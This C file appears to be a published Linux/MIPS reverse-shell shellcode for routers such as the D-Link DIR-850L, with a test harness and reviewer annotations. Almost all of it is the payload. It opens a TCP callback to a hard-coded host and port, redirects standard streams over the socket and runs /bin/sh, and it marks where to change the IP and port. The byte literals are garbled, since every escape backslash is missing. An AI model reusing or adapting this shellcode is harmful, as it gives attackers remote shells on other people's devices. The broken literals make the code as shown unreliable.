/*
# Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)
# Author: cq674350529
# Date: 2018-10-07
# - execve('/bin/sh'), tcp - 192.168.2.157/31337
# - used in HTTP Request
# - tested on D-Link dir-850l router, avoids the bad chars ('\x00', '\x20', '\x23', '\x0d\x0a')
# - based on rigan's shellcode and metasploit's shellcode, no encoder used
*/

#include <stdio.h>

/*
 * Payload bytes: one 4-byte big-endian MIPS instruction per literal, with
 * its disassembly in the trailing comment. Stages, in order: socket(),
 * connect() to a sockaddr_in assembled on the stack, dup2() of the socket
 * onto fds 2, 1, 0, then execve("//bin/sh", ["//bin/sh", NULL], NULL).
 * Syscall numbers are Linux MIPS o32 (4000 + n).
 *
 * Small constants are never encoded directly: they are derived from a
 * negative immediate via nor/addi, and the syscall instruction carries a
 * non-zero code field. Presumably this is what keeps the 0x00 (and other
 * bad) bytes listed in the header out of the encoding — e.g. a direct
 * `li $a0, 2` would contain two 0x00 bytes; confirm against assembler output.
 *
 * Detection note: the callback address and port are plain lui/ori
 * immediates (0xc0a8 / 0x029d and 0x7a69), i.e. the constants that
 * identify this particular payload inside an HTTP request.
 *
 * NOTE(review): as rendered on this page the `\` of every `\xNN` escape has
 * been lost, so the literals below are plain ASCII text rather than the
 * 181 bytes the header describes; sizeof(sc) will not equal 181 here.
 */
unsigned char sc[] =
"x24x0fxffxfa" // li $t7, -6
"x01xe0x78x27" // nor $t7, $zero              -> $t7 = 5
"x21xe4xffxfd" // addi $a0, $t7, -3           -> domain = 2 (AF_INET)
"x21xe5xffxfd" // addi $a1, $t7, -3           -> type = 2 (SOCK_STREAM)
"x28x06xffxff" // slti $a2, $zero, -1         -> protocol = 0
"x24x02x10x57" // li $v0, 4183 ( sys_socket )
"x01x01x01x0c" // syscall 0x40404             code field non-zero so the word has no 0x00 bytes
"xafxa2xffxff" // sw $v0, -1($sp)             save the socket fd; -1($sp) is not 4-aligned if $sp is — works only where unaligned access is fixed up, TODO confirm
"x8fxa4xffxff" // lw $a0, -1($sp)             fd -> connect() arg 0
"x34x0fxffxfd" // ori $t7, $zero, 0xfffd ( page calls it li $t7, -3 )
"x01xe0x78x27" // nor $t7, $zero              -> 0xffff0002
"xafxafxffxe0" // sw $t7, -0x20($sp)          the 0x0002 half lands at -0x1e: sin_family = AF_INET

/* ================ You can change port here ================= */
"x3cx0ex7ax69" // lui $t6, 0x7a69 ( sin_port = 0x7a69 = 31337 )
/* ============================================================ */

"x35xcex7ax69" // ori $t6, $t6, 0x7a69       -> 0x7a697a69; the low half is overwritten by the address store below
"xafxaexffxe4" // sw $t6, -0x1c($sp)          sin_port at -0x1c

/* ================ You can change ip here ================= */
"x3cx0exc0xa8" // lui $t6, 0xc0a8 ( sin_addr = 0xc0a8 ...
"x35xcex02x9d" // ori $t6, $t6, 0x029d ... 0x029d   -> 0xc0a8029d = 192.168.2.157
/* ============================================================ */

"xafxaexffxe6" // sw $t6, -0x1a($sp)          sin_addr at -0x1a
"x27xa5xffxe2" // addiu $a1, $sp, -0x1e       &sockaddr_in (family -0x1e, port -0x1c, addr -0x1a)
"x24x0cxffxef" // li $t4, -17 ( addrlen = 16 )
"x01x80x30x27" // nor $a2, $t4, $zero         -> 16
"x24x02x10x4a" // li $v0, 4170 ( sys_connect )
"x01x01x01x0c" // syscall 0x40404             connect()'s return value is never checked; a failed connect still falls through to the shell
"x24x0fxffxfd" // li t7,-3
"x01xe0x28x27" // nor a1,t7,zero              -> $a1 = 2, the first fd to dup2() onto
"x8fxa4xffxff" // lw $a0, -1($sp)             socket fd
// dup2_loop:
"x24x02x0fxdf" // li $v0, 4063 ( sys_dup2 )
"x01x01x01x0c" // syscall 0x40404
"x24xa5xffxff" // addi a1,a1,-1 (x20xa5xffxff)   encoded as addiu here; next lower fd
"x24x01xffxff" // li at,-1
"x14xa1xffxfb" // bne a1,at, dup2_loop        loops over fds 2, 1, 0; exits when $a1 reaches -1
"x28x06xffxff" // slti $a2, $zero, -1         branch delay slot (runs every iteration); leaves envp = NULL
"x3cx0fx2fx2f" // lui $t7, 0x2f2f             "//"
"x35xefx62x69" // ori $t7, $t7, 0x6269        "bi"
"xafxafxffxec" // sw $t7, -0x14($sp)          "//bi" at -0x14
"x3cx0ex6ex2f" // lui $t6, 0x6e2f             "n/"
"x35xcex73x68" // ori $t6, $t6, 0x7368        "sh"
"xafxaexffxf0" // sw $t6, -0x10($sp)          "n/sh" at -0x10
"xafxa0xffxf4" // sw $zero, -0xc($sp)         NUL terminator: path = "//bin/sh"
"x27xa4xffxec" // addiu $a0, $sp, -0x14       filename
"xafxa4xffxf8" // sw $a0, -8($sp)             argv[0] = filename
"xafxa0xffxfc" // sw $zero, -4($sp)           argv[1] = NULL
"x27xa5xffxf8" // addiu $a1, $sp, -8          argv
"x24x02x0fxab" // li $v0, 4011 (sys_execve)
"x01x01x01x0c"; // syscall 0x40404

/*
 * Test harness: prints sizeof(sc) and then jumps into the byte array.
 *
 * NOTE(review): three defects as written. `void main` is non-standard
 * (`int main(void)` is the hosted signature). `sizeof` yields size_t, so
 * printing it with `%d` is a format/argument mismatch and undefined
 * behaviour (`%zu` is the matching specifier). And assigning an
 * `unsigned char *` to a function pointer is an incompatible-pointer-type
 * conversion that compilers at least warn about. Independently of those,
 * the jump only succeeds where the data segment is mapped executable;
 * under W^X / NX enforcement the process faults before the payload runs,
 * which is the mitigation a hardened target relies on here.
 */
void main(void)
{
void(*s)(void);
printf("size: %d ", sizeof(sc)); // NOTE(review): %d with a size_t argument is UB
s = sc; // NOTE(review): data pointer assigned to a function pointer (incompatible types)
s();
}